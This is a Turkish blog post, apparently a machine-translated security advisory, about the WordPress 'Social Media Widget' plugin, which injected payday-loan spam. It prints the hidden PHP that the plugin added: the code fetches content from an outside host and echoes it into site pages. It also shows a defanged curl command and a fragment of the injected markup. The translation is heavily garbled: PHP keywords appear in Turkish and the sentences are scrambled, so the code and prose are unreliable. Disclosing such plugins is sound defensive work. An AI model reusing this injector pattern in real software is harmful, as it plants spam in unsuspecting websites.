25 Haziran 2013 Salı

WordPress Plugin Sosyal Medya Widget Spam gizlenmesi - şimdi çıkarın

Eğer Sosyal Medya Widget eklentisi (sosyal-medya-widget) kullanıyorsanız, web sitenizden derhal kaldırmak için emin olun. Biz web sitelerine istenmeyen enjekte etmek için kullanılan ve aynı zamanda edilmiştir keşfetti WordPress Plugin deposundan kaldırıldı .
Bu fazla 900.000 indirme ile çok popüler bir eklenti. Bu web sitelerinin bir çok etki potansiyeline sahiptir.
Ekran AM 11.03.12 de 2013/04/09 Shot
Teknik detaylar
Eklenti bu URL'ye gizli bir çağrı vardır: eklentisi çalışan web sitelerine "Pay Günü Kredisi" spam enjekte etmek için kullanılır httx :/ / i.aaur.net / i.php,. Bu tarayıcıda gibi görünüyor nasıl:
fonksiyonu nemoViewState () { 
var a = 0, m, v, t, z, x = new ... 
<p class="nemonn"> <a href = "httx :/ / paydaypam.co. tr /" title = "Payday Kredi "> loans
Onlar eklentinin sürüm 4.0 başlattığı kötü amaçlı kod sadece 12 gün önce eklendi. Bu yüzden daha fazla bilgi kadar herkesin hemen bu eklenti kaldırır tavsiye vardır. Bizim ücretsiz SiteCheck tarayıcı sitenizin SPAM bu tip enjekte edilmiş ise tespit yok.
Bu eklenti eklendi kodu:
470 
471 $ smw_url = "hxxp :/ / i.aaur.net / i.php"; 
472 ise {(function_exists ("smw_get")!) 
473 işlevi smw_get ($ f) { 
474 $ yanıt = wp_remote_get ($ f) , 
475 if (is_wp_error ($ cevap)) { 
476 fonksiyonu smw_get_body ($ f) { 
477 $ ch = @ curl_init (); 
478 @ curl_setopt ($ ch, CURLOPT_URL, $ f); 
479 @ curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, ) true; 
480 $ çıkış = @ curl_exec ($ ch); 
481 @ curl_close ($ ch); 
482 return $ çıktı; 
483} 
484 echo smw_get_body ($ f); 
485} else { 
486 echo $ cevap ["beden"] , 
487} 
} 488 
489 smw_get ($ smw_url); 
490}
Kod kendisi çok basitçe. Bu hat 471 üzerinde zararlı url çekerek nerede görebilirsiniz. Gerisi sadece taşıma ve enjeksiyon gömme hatası olduğunu.
Güvenli bir şekilde denemek istiyorsanız Aslında, sadece dostu terminali açın ve çalıştırın:
curl-D - hxxp :/ / i.aaur.net / i.php

Hiç yorum yok:

Yorum Gönder